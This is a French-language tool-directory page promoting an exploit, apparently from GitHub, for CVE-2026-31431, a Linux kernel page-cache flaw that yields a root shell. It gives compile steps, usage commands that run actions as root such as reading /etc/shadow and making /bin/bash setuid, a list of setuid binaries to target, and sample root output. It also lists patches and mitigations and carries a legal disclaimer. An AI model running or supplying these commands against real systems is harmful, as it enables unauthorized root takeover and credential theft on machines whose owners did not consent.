Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
copy-fail_LPE_Interactive — Exploit pour CVE-2026-31431, une vulnérabilité de corruption du cache de pages du noyau Linux, fournissant un shell racine interactif et une exécution de commandes non interactive via des chaînes AF_ALG et splice(). | Kitploit
Outils/GitHubGitHub/h1d3r/copy-fail_lpe_interactive
Escalade de PrivilègesFrameworks d'ExploitationAnalyse des VulnérabilitésExploitationTests d'IntrusionExploitation de Binaires
GitHubh1d3r/copy-fail_lpe_interactive

copy-fail_LPE_Interactive

Exploit pour CVE-2026-31431, une vulnérabilité de corruption du cache de pages du noyau Linux, fournissant un shell racine interactif et une exécution de commandes non interactive via des chaînes AF_ALG et splice().

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 3 moisPas encore vérifié

CVE-2026-31431 Copy Fail Exploit

Outil d'exploitation de la vulnérabilité de pollution du page cache du noyau Linux, prenant en charge l'exécution de commandes non interactive.

Aperçu de la vulnérabilité

CVE-2026-31431 est une vulnérabilité de défaut logique dans le noyau Linux, présente dans l'implémentation de l'algorithme AEAD authencesn. Via la chaîne d'appels système AF_ALG et splice(), un attaquant peut écrire 4 octets de données dans le page cache de n'importe quel fichier lisible.

Portée affectée :

  • Noyau Linux 4.14+ (2017 - avril 2026)
  • Presque toutes les distributions majeures : Ubuntu, Debian, CentOS, RHEL, Amazon Linux, etc.

Caractéristiques de la vulnérabilité :

  • Fiabilité à 100 %, aucune condition de concurrence requise
  • Aucun calcul d'offset du noyau nécessaire
  • Un seul binaire compatible avec toutes les distributions
  • Ne modifie pas les fichiers sur disque, pollue uniquement le cache mémoire

Description des fichiers

root@kitploit:~
.
├── copyfail_universal.c    # Code source du POC principal (compilation statique, sans dépendance libc)
├── copyfail_universal      # Binaire compilé
├── run_cmd.sh              # Script wrapper d'exécution non interactive
├── Makefile                # Script de compilation
└── README.md               # Ce document

Compilation

root@kitploit:~
# Méthode 1 : avec gcc et ld
gcc -c copyfail_universal.c -o copyfail_universal.o -O2 -fno-stack-protector -fno-pic -fno-pie
ld copyfail_universal.o -o copyfail_universal -static -nostdlib
chmod +x copyfail_universal

# Méthode 2 : avec Makefile
make

Utilisation

Shell Root Interactif

root@kitploit:~
./copyfail_universal

Exécution de commandes non interactive

root@kitploit:~
# Méthode 1 : avec le script wrapper (recommandé)
./run_cmd.sh "id"
./run_cmd.sh "cat /etc/shadow"
./run_cmd.sh "chmod 4777 /bin/bash"

# Méthode 2 : via un pipe
echo 'id > /tmp/pwned.txt; exit' | ./copyfail_universal

# Méthode 3 : avec une variable d'environnement
CMD='whoami' ./copyfail_universal

Spécification d'une autre cible setuid

root@kitploit:~
# La cible par défaut est /usr/bin/su
# Vous pouvez spécifier une autre cible en modifiant la variable path dans le code source

# Cibles courantes disponibles :
# /usr/bin/su
# /usr/bin/passwd
# /usr/bin/chsh
# /usr/bin/chfn
# /usr/bin/gpasswd
# /usr/bin/pkexec

Récupération automatique

La vulnérabilité ne modifie que le page cache, pas les fichiers sur disque. Exécutez la commande suivante pour récupérer :

root@kitploit:~
sync; echo 3 > /proc/sys/vm/drop_caches

Le script run_cmd.sh intègre déjà la fonctionnalité de récupération automatique.

Exemple de sortie

root@kitploit:~
$ ./run_cmd.sh "id"

[*] CVE-2026-31431 Copy Fail Exploit
[*] Target: /usr/bin/su
[*] Mode: Interactive shell
[*] Payload size: 112 bytes
[*] Corrupting page cache...
[+] Done! Executing su...

uid=0(root) gid=1000(user) groups=1000(user),4(adm),27(sudo)

Programmes setuid affectés

Recherche de tous les programmes setuid sur le système :

root@kitploit:~
find / -perm -4000 -user root -type f 2>/dev/null

Recommandations de correctif

  1. Mettre à jour le noyau - Mettez à niveau vers une version du noyau incluant le correctif a664bf3d603d

  2. Atténuation temporaire - Désactivez le module algif_aead :

    root@kitploit:~
    echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
    rmmod algif_aead 2>/dev/null || true
    
  3. Environnement conteneurisé - Utilisez seccomp pour bloquer la création de sockets AF_ALG

Détails techniques

  • Type de vulnérabilité : Écriture hors limites dans le page cache
  • Cause racine : authencesn utilise le tampon cible comme stockage temporaire, écrivant 4 octets au-delà des limites
  • Méthode d'exploitation : Transmission des pages du page cache au sous-système crypto via splice()
  • Capacité d'écriture : 4 octets peuvent être écrits dans le page cache de n'importe quel fichier lisible à chaque opération

Avertissement

Cet outil est destiné uniquement à la recherche en sécurité et aux tests autorisés. L'utilisation de cet outil pour attaquer des systèmes non autorisés est illégale. L'utilisateur assume seul l'entière responsabilité légale.

Références

  • CVE-2026-31431 Write-up
  • Xint Blog - Copy Fail
  • GitHub - POC officiel
Télécharger l’outil
ProgrammeCheminDisponibilité
su/usr/bin/su✅ Par défaut
passwd/usr/bin/passwd✅
chsh/usr/bin/chsh✅
chfn/usr/bin/chfn✅
gpasswd/usr/bin/gpasswd✅
pkexec/usr/bin/pkexec✅
mount/bin/mount✅
umount/bin/umount✅